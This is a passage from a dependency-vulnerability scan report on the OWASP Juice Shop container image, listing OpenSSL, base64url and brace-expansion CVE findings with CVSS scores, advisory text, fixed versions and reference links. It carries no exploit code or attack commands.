+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via type confusion in PKCS#7 signature verification
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: A type confusion vulnerability exists in the signature
+verification of signed PKCS#7 data where an ASN1_TYPE union member is
+accessed without first validating the type, causing an invalid or NULL
+pointer dereference when processing malformed PKCS#7 data.

+

Impact summary: An application performing signature verification of PKCS#7
+data or calling directly the PKCS7_digest_from_attributes() function can be
+caused to dereference an invalid or NULL pointer when reading, resulting in
+a Denial of Service.

+

The function PKCS7_digest_from_attributes() accesses the message digest attribute
+value without validating its type. When the type is not V_ASN1_OCTET_STRING,
+this results in accessing invalid memory through the ASN1_TYPE union, causing
+a crash.

+

Exploiting this vulnerability requires an attacker to provide a malformed
+signed PKCS#7 to an application that verifies it. The impact of the
+exploit is just a Denial of Service, the PKCS7 API is legacy and applications
+should be using the CMS API instead. For these reasons the issue was
+assessed as Low severity.

+

The FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#7 parsing implementation is outside the OpenSSL FIPS module
+boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2026-22796
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-r9hf-rxjm-gv2f
+https://github.com/openssl/openssl/commit/2502e7b7d4c0cf4f972a881641fe09edc67aeec4
+https://github.com/openssl/openssl/commit/572844beca95068394c916626a6d3a490f831a49
+https://github.com/openssl/openssl/commit/7bbca05be55b129651d9df4bdb92becc45002c12
+https://github.com/openssl/openssl/commit/eeee3cbd4d682095ed431052f00403004596373e
+https://github.com/openssl/openssl/commit/ef2fb66ec571564d64d1c74a12e388a2a54d05d2
+https://linux.oracle.com/cve/CVE-2026-22796.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-22796
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2026-22796

+ + + + + + + +
+
+
+
+ Finding 63: CVE-2026-31790 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 754 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

+ + +
Description
+

openssl: openssl: Information Disclosure from Uninitialized Memory via Invalid RSA Public Key
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: Applications using RSASVE key encapsulation to establish
+a secret encryption key can send contents of an uninitialized memory buffer to
+a malicious peer.

+

Impact summary: The uninitialized buffer might contain sensitive data from the
+previous execution of the application process which leads to sensitive data
+leakage to an attacker.

+

RSA_public_encrypt() returns the number of bytes written on success and -1
+on error. The affected code tests only whether the return value is non-zero.
+As a result, if RSA encryption fails, encapsulation can still return success to
+the caller, set the output lengths, and leave the caller to use the contents of
+the ciphertext buffer as if a valid KEM ciphertext had been produced.

+

If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an
+attacker-supplied invalid RSA public key without first validating that key,
+then this may cause stale or uninitialized contents of the caller-provided
+ciphertext buffer to be disclosed to the attacker in place of the KEM
+ciphertext.

+

As a workaround calling EVP_PKEY_public_check() or
+EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate
+the issue.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-31790
+https://github.com/advisories/GHSA-vgxx-5xj5-q97x
+https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac
+https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482
+https://github.com/openssl/openssl/commit/b922e24e5b23ffb9cb9e14cadff23d91e9f7e406
+https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790
+https://github.com/openssl/openssl/commit/eed200f58cd8645ed77e46b7e9f764e284df379e
+https://nvd.nist.gov/vuln/detail/CVE-2026-31790
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://www.cve.org/CVERecord?id=CVE-2026-31790
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 70: GHSA-rvg8-pwq2-xj7q Base64url 0.0.6 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
base64url0.0.6
+ + + + + + + +
File Path
juice-shop/node_modules/base64url/package.json
+
+
+
+ + + + + +
Description
+

Out-of-bounds Read in base64url
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.0

+

Versions of base64url before 3.0.0 are vulnerable to to +out-of-bounds reads as it allocates uninitialized Buffers when number is + passed in input on Node.js 4.x and below.

+

Recommendation

+

Update to version 3.0.0 or later.

+ + +
Mitigation
+

3.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/brianloveswords/base64url
+https://github.com/brianloveswords/base64url/commit/4fbd954a0a69e9d898de2146557cc6e893e79542
+https://github.com/brianloveswords/base64url/pull/25
+https://hackerone.com/reports/321687

+ + + + + + + +
+
+
+
+ Finding 71: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 72: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 73: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 74: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 75: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 76: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 77: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
+https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v
+https://nvd.nist.gov/vuln/detail/CVE-2026-33750
+https://www.cve.org/CVERecord?id=CVE-2026-33750

+ + + + + + + +
+
+
+
+ Finding 78: CVE-2026-33750 Brace-Expansion 1.1.12 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
brace-expansion1.1.12
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/brace-expansion/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern
+Target: Node.js
+Type: node-pkg
+Fixed version: 5.0.5, 3.0.2, 2.0.3, 1.1.13

+

The brace-expansion library generates arbitrary strings containing a +common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and +1.1.13, a brace pattern with a zero step value (e.g., {1..2..0}) + causes the sequence generation loop to run indefinitely, making the +process hang for seconds and allocate heaps of memory. Versions 5.0.5, +3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize +strings passed to expand() to ensure a step value of 0 is not used.

+ + +
Mitigation
+

5.0.5, 3.0.2, 2.0.3, 1.1.13

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-33750
+https://github.com/juliangruber/brace-expansion
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113
+https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184
+https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5
+https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2
+https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a
+https://github.com/juliangruber/brace-expansion/issues/98
+https://github.com/juliangruber/brace-expansion/pull/95
+https://github.com/juliangruber/brace-expansion/pull/96
+https://github.com/juliangruber/brace-expansion/pull/97
